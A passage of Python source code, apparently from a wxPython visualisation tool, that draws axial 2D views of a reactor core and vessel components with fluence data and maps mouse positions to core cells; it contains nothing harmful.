config[ 'fluenceAxialOffsetPix' ] = fluence_axial_offset_pix
config[ 'fluenceDataRange' ] = fluence_ds_range
config[ 'fluenceDataSetExpr' ] = fluence_ds_expr
config[ 'fluenceMapper' ] = fluence_mapper
config[ 'thetaStopIndex' ] = theta_stop_ndx
config[ 'vesselRadius' ] = vessel_r
if self.showLegend:
config[ 'fluenceLegendBitmap' ] = fluence_legend_bmap
config[ 'fluenceLegendSize' ] = fluence_legend_size
#end if fluence_mesh
return config
#end _CreateDrawConfig
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateMenuDef() -
#----------------------------------------------------------------------
def _CreateMenuDef( self ):
"""
"""
menu_def = super( VesselCoreAxial2DView, self )._CreateMenuDef()
new_menu_def = \
[ x for x in menu_def if x.get( 'label' ) != 'Unzoom' ]
return new_menu_def
#end _CreateMenuDef
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateRasterImage() -
#----------------------------------------------------------------------
def _CreateRasterImage( self, tuple_in, config = None ):
"""Called in background task to create the PIL image for the state.
@param tuple_in 0-based ( state_index, assy_col_or_row, pin_col_or_row,
theta_rad )
@param config optional config to use instead of self.config
"""
#start_time = timeit.default_timer()
state_ndx = tuple_in[ 0 ]
node_addr = self.dmgr.GetNodeAddr( self.subAddr )
if self.logger.isEnabledFor( logging.DEBUG ):
self.logger.debug( 'tuple_in=%s', str( tuple_in ) )
bmap = None
core = dset = None
if config is None:
config = self.config
if config is not None and self.dmgr.HasData():
dset = self.dmgr.GetH5DataSet( self.curDataSet, self.timeValue )
core = self.dmgr.GetCore()
#x config[ 'coreOffsetY' ] = core_offset_y_cm * pix_per_cm
if dset is not None and core is not None:
assy_wd = config[ 'assemblyWidth' ]
axial_levels_dy = config[ 'coreAxialLevelsDy' ]
core_axial_offset_pix = config[ 'coreAxialOffsetPix' ]
core_offset_cm = config.get( 'coreOffsetCm', 0 )
core_region = config[ 'coreRegion' ]
font = config[ 'font' ]
font_size = config[ 'fontSize' ]
im_wd, im_ht = config[ 'imageSize' ]
label_font = config[ 'labelFont' ]
legend_bmap = config[ 'legendBitmap' ]
legend_size = config[ 'legendSize' ]
mapper = config[ 'mapper' ]
if self.nodalMode:
node_wd = config[ 'nodeWidth' ]
npin = config[ 'npin' ]
npinx_cos_theta = config[ 'npinxCosTheta' ]
npiny_sin_theta = config[ 'npinySinTheta' ]
pin_wd = config[ 'pinWidth' ]
pix_per_cm = config[ 'pixPerCm' ]
fluence_ds_range = config.get( 'fluenceDataRange' )
fluence_legend_bmap = config.get( 'fluenceLegendBitmap' )
fluence_legend_size = config.get( 'fluenceLegendSize' )
theta_cos = config.get( 'thetaCos' )
theta_rad = config.get( 'thetaRad' )
theta_sin = config.get( 'thetaSin' )
value_font = config[ 'valueFont' ]
value_font_size = config[ 'valueFontSize' ]
vessel_region = config[ 'vesselRegion' ]
fluence_mesh = core.fluenceMesh
ds_range = config[ 'dataRange' ]
value_delta = ds_range[ 1 ] - ds_range[ 0 ]
# -- "Item" refers to channel or pin
item_factors = None
if self.state.weightsMode == 'on':
item_factors = self.dmgr.GetFactors( self.curDataSet )
dset_array = np.array( dset )
dset_shape = dset.shape
# -- Total pins, effectively
if core_offset_cm > 0:
pin_eff_count = self.cellRange[ -2 ] * npin - (npin >> 1)
else:
pin_eff_count = self.cellRange[ -2 ] * npin
if self.logger.isEnabledFor( logging.DEBUG ):
self.logger.debug(
'core_region=%s, vessel_region=%s\n' +
'core.npinx=%d, core.npiny=%d\n' +
'npinx_cos_theta=%f, npiny_sin_theta=%f\n' +
'npin=%d, pin_eff_count=%d',
str( core_region ), str( vessel_region ),
core.npinx, core.npiny, npinx_cos_theta, npiny_sin_theta,
npin, pin_eff_count
)
# -- Create title template
addresses = None
if fluence_ds_range is not None:
addresses = \
' {0:s} th={1:d}deg'.format(
self.dmgr.GetDataSetDisplayName( self.fluenceAddr.dataSetName ),
int( theta_rad * 180.0 / math.pi )
)
title_templ, title_size = self._CreateTitleTemplate2(
font, self.curDataSet, dset_shape, self.state.timeDataSet,
additional = addresses
)
node_value_draw_list = []
# -- Create image
# --
bmap, dc = self._CreateEmptyBitmapAndDC( im_wd, im_ht )
gc = self._CreateGraphicsContext( dc )
trans_brush = self._CreateTransparentBrush( gc )
trans_color_arr = np.array([ 0, 0, 0, 0 ], dtype = np.uint8 )
glabel_font = gc.CreateFont( label_font, wx.BLACK )
if self.showLabels:
#gc.SetFont( glabel_font )
yfont_size = int( math.floor( font_size * 0.6 ) )
gylabel_font = Widget.CopyFont( value_font, pt_size = yfont_size )
gc.SetFont( gylabel_font )
assy_pen = gc.CreatePen( wx.ThePenList.FindOrCreatePen(
wx.Colour( 155, 155, 155, 255 ), 1, wx.PENSTYLE_SOLID
) )
node_pen = gc.CreatePen( wx.ThePenList.FindOrCreatePen(
wx.Colour( 100, 100, 100, 255 ), 1, wx.PENSTYLE_SOLID
) )
colors = mapper.to_rgba( dset_array, bytes = True )
if item_factors is not None:
colors[ item_factors == 0 ] = trans_color_arr
colors[ np.isnan( dset_array ) ] = trans_color_arr
colors[ np.isinf( dset_array ) ] = trans_color_arr
# -- Loop on axial levels
# --
last_axial_label_y = 0
axial_y = core_region[ 1 ]
for ax in xrange( len( axial_levels_dy ) - 1, -1, -1 ):
cur_dy = axial_levels_dy[ ax ]
axial_level = ax + self.cellRange[ 1 ]
# -- Row label
# --
if self.showLabels and cur_dy > 1:
label = '{0:02d}'.format( axial_level + 1 )
#label_size = ylabel_font.getsize( label )
label_size = gc.GetFullTextExtent( label )
label_y = axial_y + ((cur_dy - label_size[ 1 ]) / 2.0)
if (last_axial_label_y + label_size[ 1 ] + 1) < (axial_y + cur_dy):
gc.SetFont( gylabel_font )
gc.DrawText( label, 1 ,label_y )
last_axial_label_y = axial_y
#end if self.showLabels and cur_dy > 1
# -- Loop on horizontal assemblies/pins
# --
pin_x = core_region[ 0 ]
pin_col_f = self.cellRange[ 0 ] * core.npinx
pin_row_f = self.cellRange[ 0 ] * core.npiny
if core_offset_cm > 0:
pin_x += assy_wd >> 1
pin_col_f += core.npinx >> 1
pin_row_f += core.npiny >> 1
pin_col_incr_f = \
(npinx_cos_theta * self.cellRange[ -2 ]) / pin_eff_count
pin_row_incr_f = \
(npiny_sin_theta * self.cellRange[ -2 ]) / pin_eff_count
if self.logger.isEnabledFor( logging.DEBUG ) and \
ax == len( axial_levels_dy ) - 1:
self.logger.debug(
'pin_col_f=%f, pin_row_f=%f\n' +
'pin_col_incr_f=%f, pin row_incr_f=%f',
pin_col_f, pin_row_f, pin_col_incr_f, pin_row_incr_f
)
for i in xrange( pin_eff_count ):
#xxxxx
# -- Column/row label
## if ax == len( axial_levels_dy ) - 1 and self.showLabels:
## label_ndx = 0 if self.mode == 'xz' else 1
## label = core.GetCoreLabel( label_ndx, assy_col )
## label_size = gc.GetFullTextExtent( label )
## label_x = assy_x + ((assy_wd - label_size[ 0 ]) / 2.0)
## gc.SetFont( glabel_font )
## gc.DrawText( label, label_x, 1 )
## #end if writing column label
pin_col = int( pin_col_f )
pin_row = int( pin_row_f )
assy_col_raw = (pin_col // core.npinx)
assy_row_raw = (pin_row // core.npiny)
assy_col = min( assy_col_raw, core.coreMap.shape[ 1 ] - 1 )
assy_row = min( assy_row_raw, core.coreMap.shape[ 0 ] - 1 )
assy_ndx = core.coreMap[ assy_row, assy_col ] - 1
assy_pin_col = pin_col % core.npinx
assy_pin_row = pin_row % core.npiny
if _DEBUG_ and self.logger.isEnabledFor( logging.DEBUG ):
self.logger.debug(
'i=%d: pin_x=%d\n pin_col=%d, pin_row=%d\n' +
' assy_col_raw=%d, assy_row_raw=%d, assy_col=%d, assy_row=%d\n' +
' assy_pin_col=%d, assy_pin_row=%d',
i, pin_x, pin_col, pin_row,
assy_col_raw, assy_row_raw, assy_col, assy_row,
assy_pin_col, assy_pin_row
)
if self.nodalMode:
node_col = assy_pin_col // (core.npinx >> 1)
node_row = assy_pin_row // (core.npiny >> 1)
if node_col > 0:
node_ndx = 3 if node_row > 0 else 1
else:
node_ndx = 2 if node_row > 0 else 0
# node_x is not set elsewhere in this slice view; assume the node occupies
# the current pin column position
node_x = pin_x
value = dset_array[ 0, node_ndx, axial_level, assy_ndx ]
cur_color = colors[ 0, node_ndx, axial_level, assy_ndx ]
if cur_color[ 3 ] > 0:
brush_color = pen_color = cur_color.tolist()
gc.SetPen( gc.CreatePen( wx.ThePenList.FindOrCreatePen(
wx.Colour( *pen_color ), 1, wx.PENSTYLE_SOLID
) ) )
gc.SetBrush( gc.CreateBrush(
wx.TheBrushList.FindOrCreateBrush(
wx.Colour( *brush_color ), wx.BRUSHSTYLE_SOLID
)
) )
gc.DrawRectangle( node_x, axial_y, node_wd + 1, cur_dy + 1 )
node_value_draw_list.append((
self._CreateValueString( value ),
Widget.GetContrastColor( *brush_color ),
node_x, axial_y, node_wd, cur_dy
))
#end if cur_color[ 3 ] > 0
#else:
elif assy_pin_col < dset_shape[ 1 ] and assy_pin_row < dset_shape[ 0 ]:
cur_color = \
colors[ assy_pin_row, assy_pin_col, axial_level, assy_ndx ]
if cur_color[ 3 ] > 0:
brush_color = pen_color = cur_color.tolist()
gc.SetPen( gc.CreatePen( wx.ThePenList.FindOrCreatePen(
wx.Colour( *pen_color ), 1, wx.PENSTYLE_SOLID
) ) )
gc.SetBrush( gc.CreateBrush(
wx.TheBrushList.FindOrCreateBrush(
wx.Colour( *brush_color ), wx.BRUSHSTYLE_SOLID
)
) )
gc.DrawRectangle( pin_x, axial_y, pin_wd, cur_dy )
#end if cur_color[ 3 ] > 0
#end elif assy_pin_col < dset_shape[ 1 ] and ...
pin_x += pin_wd
pin_col_f += pin_col_incr_f
pin_row_f += pin_row_incr_f
#end for i in xrange( pin_eff_count )
axial_y += cur_dy
#end for ax
# -- Draw values
# --
if node_value_draw_list:
self._DrawValuesWx( node_value_draw_list, gc )
# -- Draw vessel components and fluence
# --
if fluence_ds_range is not None:
self._DrawVesselComponents( gc, config, tuple_in )
# -- Draw Legend Image
# --
if legend_bmap is not None:
gc.DrawBitmap(
legend_bmap,
vessel_region[ 0 ] + vessel_region[ 2 ] + 2 + font_size, 2,
legend_bmap.GetWidth(), legend_bmap.GetHeight()
)
else:
legend_size = ( 0, 0 )
if fluence_legend_bmap is not None:
at = (
vessel_region[ 0 ] + vessel_region[ 2 ] + 2 + font_size +
legend_size[ 0 ],
2 # vessel_region[ 1 ]
)
gc.DrawBitmap(
fluence_legend_bmap, at[ 0 ], at[ 1 ],
fluence_legend_bmap.GetWidth(), fluence_legend_bmap.GetHeight()
)
else:
fluence_legend_size = ( 0, 0 )
# -- Draw Title String
# --
#axial_y = max( axial_y, legend_size[ 1 ], fluence_legend_size[ 1 ] )
axial_y = max(
axial_y,
vessel_region[ 1 ] + vessel_region[ 3 ],
legend_size[ 1 ], fluence_legend_size[ 1 ]
)
axial_y += font_size >> 2
title_str = self._CreateTitleString(
title_templ,
time = self.timeValue
)
gc.SetFont( glabel_font )
self._DrawStringsWx(
gc, font,
( title_str, ( 0, 0, 0, 255 ),
vessel_region[ 0 ], axial_y,
#vessel_region[ 2 ] - vessel_region[ 0 ],
im_wd - vessel_region[ 0 ] - (font_size << 2),
'c' )
)
# -- Draw vessel fluence values
# --
if fluence_ds_range is not None and \
self.fluenceAddr.dataSetName is not None:
self._DrawFluenceCells( gc, config, tuple_in )
# -- Finished
# --
dc.SelectObject( wx.NullBitmap )
#end if config exists
#elapsed_time = timeit.default_timer() - start_time
#if self.logger.isEnabledFor( logging.DEBUG ):
#self.logger.debug( 'time=%.3fs, im-None=%s', elapsed_time, im is None )
return bmap if bmap is not None else self.emptyBitmap
#end _CreateRasterImage
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateStateTuple() -
#----------------------------------------------------------------------
def _CreateStateTuple( self ):
"""Create tuple that is used for comparison in IsTupleCurrent().
#m @return state_index, assy_col_or_row, pin_col_or_row, theta_ndx
@return state_index, theta_ndx
"""
#m th = self.fluenceAddr.thetaIndex
#m if self.mode == 'xz':
#m t = ( self.stateIndex, self.assemblyAddr[ 2 ], self.subAddr[ 1 ], th )
#m else:
#m t = ( self.stateIndex, self.assemblyAddr[ 1 ], self.subAddr[ 0 ], th )
t = ( self.stateIndex, self.fluenceAddr.thetaIndex )
return t
#end _CreateStateTuple
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateToolTipText() -
#----------------------------------------------------------------------
def _CreateToolTipText( self, cell_info ):
"""Create a tool tip.
@param cell_info tuple returned from FindCell()
( axial_level, assy_ndx, assy_col, assy_row, pin_col, pin_row, node_addr )
"""
tip_str = ''
dset = None
valid = False
if cell_info is not None and \
self.dmgr.IsValid( self.curDataSet, axial_level = cell_info[ 0 ] ):
dset = self.dmgr.GetH5DataSet( self.curDataSet, self.timeValue )
if dset is not None:
core = self.dmgr.GetCore()
assy_addr = self.dmgr.NormalizeAssemblyAddr( cell_info[ 1 : 4 ] )
assy_addr_str = core.CreateAssyLabel( *assy_addr[ 1 : 3 ] )
tip_str = 'Assy: ' + assy_addr_str
axial_value = self.dmgr.\
GetAxialValue( self.curDataSet, core_ndx = cell_info[ 0 ] )
tip_str += ', Axial: {0:.2f}'.format( axial_value.cm )
#end if dset is not None and assy_ndx < dset.shape[ 3 ]
return tip_str
#end _CreateToolTipText
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateToolTipText() -
#----------------------------------------------------------------------
#m def _CreateToolTipText( self, cell_info ):
#m """Create a tool tip.
#m@param cell_info tuple returned from FindCell()
#m"""
#m tip_str = ''
#m dset = None
#m valid = False
#m
#m if cell_info is not None:
#m valid = self.dmgr.IsValid(
#m self.curDataSet,
#m assembly_index = cell_info[ 0 ],
#m axial_level = cell_info[ 2 ]
#m )
#m
#m if valid:
#m dset = self.dmgr.GetH5DataSet( self.curDataSet, self.timeValue )
#m
#m if dset is not None and assy_ndx < dset.shape[ 3 ]:
#m core = self.dmgr.GetCore()
#m if self.mode == 'xz':
#m assy_addr = ( cell_info[ 1 ], self.assemblyAddr[ 2 ] )
#m else:
#m assy_addr = ( self.assemblyAddr[ 1 ], cell_info[ 1 ] )
#m
#m assy_addr_str = core.CreateAssyLabel( *assy_addr )
#m tip_str = 'Assy: ' + assy_addr_str
#m
#m if cell_info[ 2 ] >= 0:
#m axial_value = self.dmgr.\
#m GetAxialValue( self.curDataSet, core_ndx = cell_info[ 2 ] )
#m tip_str += ', Axial: {0:.2f}'.format( axial_value.cm )
#m #end if dset is not None and assy_ndx < dset.shape[ 3 ]
#m
#m return tip_str
#m #end _CreateToolTipText
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._DrawFluenceCells() -
#----------------------------------------------------------------------
def _DrawFluenceCells( self, gc, config, tuple_in ):
"""Handles drawing fluence data.
@param gc wx.GraphicsContext instance
@param config draw configuration dict
@param tuple_in state tuple ( state_index, theta_ndx )
"""
theta_ndx = tuple_in[ 1 ]
dset = None
core = self.dmgr.GetCore()
ds_range = config.get( 'fluenceDataRange' )
if theta_ndx >= 0 and ds_range is not None:
dset = \
self.dmgr.GetH5DataSet( self.fluenceAddr.dataSetName, self.timeValue )
if dset is not None and core is not None:
amode = gc.GetAntialiasMode()
cmode = gc.GetCompositionMode()
gc.SetAntialiasMode( wx.ANTIALIAS_NONE ) # _DEFAULT
gc.SetCompositionMode( wx.COMPOSITION_SOURCE ) # _OVER
theta_ndx = min( theta_ndx, dset.shape[ 1 ] - 1 )
dset_array = np.array( dset )
value_delta = ds_range[ 1 ] - ds_range[ 0 ]
ax_ranges = self._GetAxialRanges()
core_bottom_cm = ax_ranges.get( 'cm_bottom' )
#core_axial_dy = config[ 'coreAxialDy' ]
core_region = config[ 'coreRegion' ]
#x liner_r = config[ 'linerRadius' ]
pix_per_cm = config[ 'pixPerCm' ]
r_start_ndx = config[ 'radiusStartIndex' ]
fluence_axials_dy = config[ 'fluenceAxialLevelsDy' ]
fluence_axial_offset_pix = config[ 'fluenceAxialOffsetPix' ]
fluence_mapper = config[ 'fluenceMapper' ]
vessel_region = config[ 'vesselRegion' ]
vessel_origin = vessel_region[ 0 : 2 ]
vessel_origin[ 1 ] += fluence_axial_offset_pix
if config.get( 'coreOffsetCm', 0 ) > 0:
assy_wd = config[ 'assemblyWidth' ]
vessel_origin[ 0 ] += assy_wd >> 1
#vessel_origin[ 1 ] += assy_wd >> 1
max_axial_y = vessel_origin[ 1 ] + config[ 'fluenceAxialDy' ]
trans_color_arr = np.array([ 0, 0, 0, 0 ], dtype = np.uint8 )
# Can't do this here b/c to_rgba() treats ndim == 3 or 4 as image
# cur_array = dset_array[ :, :, : ]
# colors = fluence_mapper.to_rgba( cur_array, bytes = True )
# colors[ np.isnan( cur_array ) ] = trans_color_arr
# colors[ np.isinf( cur_array ) ] = trans_color_arr
# -- Outer loop is r
# --
for ri in xrange( r_start_ndx, core.fluenceMesh.nr ):
if ri == r_start_ndx:
r1_wd = int( math.ceil( core.fluenceMesh.r[ ri ] * pix_per_cm ) )
r2_wd = int( math.ceil( core.fluenceMesh.r[ ri + 1 ] * pix_per_cm ) )
#cur_r = (r1_wd + r2_wd) >> 1
cur_r = r2_wd
cur_wd = max( 1, r2_wd - r1_wd + 1 )
cur_array = dset_array[ :, :, ri ]
colors = fluence_mapper.to_rgba( cur_array, bytes = True )
colors[ np.isnan( cur_array ) ] = trans_color_arr
colors[ np.isinf( cur_array ) ] = trans_color_arr
# -- Inner loop is z
# --
axial_y = vessel_origin[ 1 ]
axial_cm = ax_ranges.get( 'cm_top' )
for ax in xrange( len( fluence_axials_dy ) - 1, -1, -1 ):
cur_dy = fluence_axials_dy[ ax ]
cur_color = colors[ ax, theta_ndx ]
if cur_color[ 3 ] > 0:
pen_color = cur_color.tolist()
path = gc.CreatePath()
path.MoveToPoint( vessel_origin[ 0 ] + cur_r, axial_y )
path.AddLineToPoint(
vessel_origin[ 0 ] + cur_r,
min( axial_y + cur_dy, max_axial_y )
)
cur_pen = wx.ThePenList.FindOrCreatePen(
wx.Colour( *pen_color ), cur_wd, wx.PENSTYLE_SOLID
)
cur_pen.SetCap( wx.CAP_BUTT )
gc.SetPen( gc.CreatePen( cur_pen ) )
gc.StrokePath( path )
#end if not self.dmgr.IsBadValue( value )
axial_y += cur_dy
#end for ax in xrange( len( fluence_axial_levels_dy ) - 1, -1, -1 )
r1_wd = r2_wd
#end for ri
gc.SetAntialiasMode( amode )
gc.SetCompositionMode( cmode )
#end if dset
#end _DrawFluenceCells
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._DrawVesselComponents() -
#----------------------------------------------------------------------
def _DrawVesselComponents( self, gc, config, tuple_in ):
"""Handles drawing vessel components from the vessel definition
@param gc wx.GraphicsContext instance
@param config draw configuration dict
@param tuple_in state tuple ( state_index, theta_ndx )
"""
core = self.dmgr.GetCore()
if self.logger.isEnabledFor( logging.DEBUG ):
self.logger.debug( 'config\n%s', str( config ) )
theta_rad = core.fluenceMesh.GetThetaRads( tuple_in[ 1 ] )
theta_deg = theta_rad * 180.0 / math.pi
assy_wd = config[ 'assemblyWidth' ]
core_axial_dy = config[ 'coreAxialDy' ]
axial_levels_dy = config[ 'coreAxialLevelsDy' ]
core_axial_offset_pix = config[ 'coreAxialOffsetPix' ]
core_region = config[ 'coreRegion' ]
pin_cm = config[ 'pinCm' ]
pix_per_cm = config[ 'pixPerCm' ]
fluence_axial_dy = config[ 'fluenceAxialDy' ]
fluence_axial_offset_pix = config[ 'fluenceAxialOffsetPix' ]
vessel_region = config[ 'vesselRegion' ]
# -- Barrel
# --
barrel_r = config[ 'barrelRadius' ]
barrel_wd = config[ 'barrelWidth' ]
barrel_r += (barrel_wd >> 1)
liner_r = config[ 'linerRadius' ]
vessel_r = config[ 'vesselRadius' ]
vessel_wd = vessel_r - (liner_r + 1)
vessel_r = liner_r + 1 + (vessel_wd >> 1)
core_origin = core_region[ 0 : 2 ]
vessel_origin = vessel_region[ 0 : 2 ]
vessel_origin[ 1 ] += fluence_axial_offset_pix
if config.get( 'coreOffsetCm', 0 ) > 0:
core_origin[ 0 ] += assy_wd >> 1
vessel_origin[ 0 ] += assy_wd >> 1
#vessel_origin[ 1 ] += assy_wd >> 1
# -- Baffle
# --
if core.coreSym == 4:
baffle_wd = config[ 'baffleWidth' ]
cur_dx = core_region[ 2 ] + 1
path = gc.CreatePath()
# axial_y = core_region[ 1 ]
# for ax in range( len( axial_levels_dy ) - 1, -1, -1 ):
# cur_dy = axial_levels_dy[ ax ]
# if cur_dy > 0:
# axial_y += cur_dy
# #end if cur_dy > 0
#end for ax
path.MoveToPoint( core_region[ 0 ] + cur_dx, core_region[ 1 ] )
#path.AddLineToPoint( core_region[ 0 ] + cur_dx, axial_y )
path.AddLineToPoint(
core_region[ 0 ] + cur_dx, core_region[ 1 ] + core_axial_dy
)
cur_pen = wx.ThePenList.FindOrCreatePen(
wx.Colour( 155, 155, 155, 255 ), baffle_wd, wx.PENSTYLE_SOLID
)
cur_pen.SetCap( wx.CAP_BUTT )
gc.SetPen( gc.CreatePen( cur_pen ) )
gc.StrokePath( path )
#end if core.coreSym == 4
# -- Barrel
# --
path = gc.CreatePath()
path.MoveToPoint( vessel_origin[ 0 ] + barrel_r, core_region[ 1 ] )
path.AddLineToPoint(
vessel_origin[ 0 ] + barrel_r,
core_region[ 1 ] + core_axial_dy
)
cur_pen = wx.ThePenList.FindOrCreatePen(
wx.Colour( 200, 200, 200, 255 ), barrel_wd, wx.PENSTYLE_SOLID
)
cur_pen.SetCap( wx.CAP_BUTT )
gc.SetPen( gc.CreatePen( cur_pen ) )
gc.StrokePath( path )
# -- Pad
# --
pad_wd = config[ 'padWidth' ]
if pad_wd > 0:
show_pad = False
pad_angles = config[ 'padAngles' ]
if len( pad_angles ) > 0:
pad_arc_half = config[ 'padArc' ] / 2.0
for an in pad_angles:
if theta_deg >= an - pad_arc_half and theta_deg <= an + pad_arc_half:
show_pad = True
break
#end for an
#end if pad_angles
if show_pad:
pad_r = config[ 'padRadius' ] + (pad_wd >> 1)
path = gc.CreatePath()
path.MoveToPoint( vessel_origin[ 0 ] + pad_r, core_region[ 1 ] )
path.AddLineToPoint(
vessel_origin[ 0 ] + pad_r,
core_region[ 1 ] + core_axial_dy
)
cur_pen = wx.ThePenList.FindOrCreatePen(
wx.Colour( 175, 175, 175, 255 ), pad_wd, wx.PENSTYLE_SOLID
)
cur_pen.SetCap( wx.CAP_BUTT )
gc.SetPen( gc.CreatePen( cur_pen ) )
gc.StrokePath( path )
#end if show_pad
#end if self.vesselShowPad
# -- Vessel ring
# --
path = gc.CreatePath()
vx = vessel_origin[ 0 ] + vessel_r
path.MoveToPoint( vx, vessel_origin[ 1 ] )
#path.AddLineToPoint( vx, vessel_origin[ 1 ] + vessel_region[ 3 ] )
path.AddLineToPoint( vx, vessel_origin[ 1 ] + fluence_axial_dy )
cur_pen = wx.ThePenList.FindOrCreatePen(
wx.Colour( 175, 175, 175, 255 ), vessel_wd, wx.PENSTYLE_SOLID
)
cur_pen.SetCap( wx.CAP_BUTT )
gc.SetPen( gc.CreatePen( cur_pen ) )
gc.StrokePath( path )
# -- Liner
# --
path = gc.CreatePath()
path.MoveToPoint( vessel_origin[ 0 ] + liner_r, vessel_origin[ 1 ] )
path.AddLineToPoint(
vessel_origin[ 0 ] + liner_r,
vessel_origin[ 1 ] + fluence_axial_dy
#vessel_origin[ 1 ] + vessel_region[ 3 ]
)
cur_pen = wx.ThePenList.FindOrCreatePen(
wx.Colour( 0, 0, 0, 255 ), 1, wx.PENSTYLE_SOLID
)
cur_pen.SetCap( wx.CAP_BUTT )
gc.SetPen( gc.CreatePen( cur_pen ) )
gc.StrokePath( path )
#end _DrawVesselComponents
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.FindCell() -
#----------------------------------------------------------------------
def FindCell( self, ev_x, ev_y ):
"""
:returns: ( axial_level, assy_ndx, assy_col, assy_row, pin_col, pin_row,
node_addr )
"""
result = core = None
if self.config is not None and self.dmgr is not None and \
'coreOffsetCm' in self.config:
core = self.dmgr.GetCore()
in_region_flag = False
if core is not None and core.coreMap is not None:
core_region = self.config[ 'coreRegion' ]
if ev_x >= core_region[ 0 ] and ev_y >= core_region[ 1 ] and \
ev_x <= core_region[ 0 ] + core_region[ 2 ] and \
ev_y <= core_region[ 1 ] + core_region[ 3 ]:
in_region_flag = True
#if core is not None and core.coreMap is not None:
if in_region_flag:
assy_wd = self.config[ 'assemblyWidth' ]
core_axials_dy = self.config[ 'coreAxialLevelsDy' ]
core_offset_cm = self.config[ 'coreOffsetCm' ]
npin = self.config[ 'npin' ]
npinx_cos_theta = self.config[ 'npinxCosTheta' ]
npiny_sin_theta = self.config[ 'npinySinTheta' ]
pin_wd = self.config[ 'pinWidth' ]
theta_cos = self.config[ 'thetaCos' ]
theta_sin = self.config[ 'thetaSin' ]
node_addr = -1
# -- Total pins, effectively
pin_eff_count = self.cellRange[ -2 ] * npin
off_x = ev_x - core_region[ 0 ]
off_y = ev_y - core_region[ 1 ]
if core_offset_cm > 0:
off_x -= assy_wd >> 1
pin_eff_count -= npin >> 1
axial_level = 0
ax_y = 0
for ax in range( len( core_axials_dy ) -1, -1, -1 ):
ax_y += core_axials_dy[ ax ]
if off_y <= ax_y:
axial_level = ax + self.cellRange[ 1 ]
break
horz_factor = float( off_x ) / core_region[ 2 ]
#pin_col = int( horz_factor * npinx_cos_theta * core.npinx )
#pin_row = int( horz_factor * npiny_sin_theta * core.npiny )
pin_col = int( horz_factor * theta_cos * pin_eff_count )
pin_col = max( 0, min( pin_col, pin_eff_count - 1 ) )
pin_row = int( horz_factor * theta_sin * pin_eff_count )
pin_row = max( 0, min( pin_row, pin_eff_count - 1 ) )
assy_col_raw = (pin_col // core.npinx) + self.cellRange[ 0 ]
assy_row_raw = (pin_row // core.npiny) + self.cellRange[ 0 ]
assy_col = min( assy_col_raw, core.coreMap.shape[ 1 ] - 1 )
assy_row = min( assy_row_raw, core.coreMap.shape[ 0 ] - 1 )
assy_ndx = core.coreMap[ assy_row, assy_col ] - 1
assy_pin_col = pin_col % core.npinx
assy_pin_row = pin_row % core.npiny
if _DEBUG_ and self.logger.isEnabledFor( logging.DEBUG ):
self.logger.debug(
'off_x=%d/%d, pin_eff_count=%d, horz_factor=%f\n pin_col=%d, pin_row=%d\n' +
' assy_col_raw=%d, assy_row_raw=%d, assy_col=%d, assy_row=%d\n' +
' assy_pin_col=%d, assy_pin_row=%d',
off_x, core_region[ 2 ], pin_eff_count, horz_factor,
pin_col, pin_row,
assy_col_raw, assy_row_raw, assy_col, assy_row,
assy_pin_col, assy_pin_row
)
if self.nodalMode:
node_col = assy_pin_col // (core.npinx >> 1)
node_row = assy_pin_row // (core.npiny >> 1)
if node_col > 0:
node_addr = 3 if node_row > 0 else 1
else:
node_addr = 2 if node_row > 0 else 0
result = (
axial_level, assy_ndx, assy_col, assy_row,
assy_pin_col, assy_pin_row, node_addr
)
#end if core is not None and core.coreMap is not None
return result
#end FindCell
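  # Worked example of the mapping above, using purely hypothetical numbers
  # (assuming coreOffsetCm == 0): with core_region[ 2 ] = 400 px,
  # off_x = 200, theta_cos = 1.0 (theta = 0), npin = 17 and
  # cellRange[ -2 ] = 10, pin_eff_count = 170, so horz_factor = 0.5 and
  # pin_col = int( 0.5 * 1.0 * 170 ) = 85; then
  # assy_col_raw = (85 // 17) + cellRange[ 0 ] and assy_pin_col = 85 % 17 = 0.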
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.FindCell() -
#----------------------------------------------------------------------
#m def FindCell( self, ev_x, ev_y ):
#m """
#m@return ( assy_ndx, assy_col_or_row, axial_level, pin_col_or_row, node_addr )
#m"""
#m result = core = None
#m
#m if self.config is not None and self.dmgr is not None:
#m core = self.dmgr.GetCore()
#m
#m if core is not None and core.coreMap is not None:
#m assy_wd = self.config[ 'assemblyWidth' ]
#m axials_dy = self.config[ 'axialLevelsDy' ]
#m core_region = self.config[ 'coreRegion' ]
#m node_addr = -1
#m
#m off_x = ev_x - core_region[ 0 ]
#m off_y = ev_y - core_region[ 1 ]
#m
#m if self.mode == 'xz':
#m assy_row = self.assemblyAddr[ 2 ]
#m assy_col = min(
#m int( off_x / assy_wd ) + self.cellRange[ 0 ],
#m self.cellRange[ 2 ] - 1
#m )
#m assy_col = max( assy_col, self.cellRange[ 0 ] )
#m assy_col_or_row = assy_col
#m
#m pin_offset = off_x % assy_wd
#m if self.nodalMode:
#m pin_col_or_row, node_addr = self._FindPinNodal( pin_offset )
#m else:
#m pin_col_or_row = self._FindPinNonNodal( pin_offset )
#m max_col_or_row = core.npinx + 1 if self.channelMode else core.npinx
#m if pin_col_or_row >= max_col_or_row: pin_col_or_row = -1
#m
#m else:
#m assy_col = self.assemblyAddr[ 1 ]
#m assy_row = min(
#m int( off_y / assy_wd ) + self.cellRange[ 0 ],
#m self.cellRange[ 2 ] - 1
#m )
#m assy_row = max( assy_row, self.cellRange[ 0 ] )
#m assy_col_or_row = assy_row
#m
#m pin_offset = off_x % assy_wd
#m if self.nodalMode:
#m pin_col_or_row, node_addr = self._FindPinNodal( pin_offset )
#m else:
#m pin_col_or_row = self._FindPinNonNodal( pin_offset )
#m max_col_or_row = core.npiny + 1 if self.channelMode else core.npiny
#m if pin_col_or_row >= max_col_or_row: pin_col_or_row = -1
#m #end if-else self.mode
#m
#m axial_level = 0
#m ax_y = 0
#m for ax in range( len( axials_dy ) -1, -1, -1 ):
#m ax_y += axials_dy[ ax ]
#m if off_y <= ax_y:
#m axial_level = ax + self.cellRange[ 1 ]
#m break
#m
#m assy_ndx = core.coreMap[ assy_row, assy_col ] - 1
#m result = \
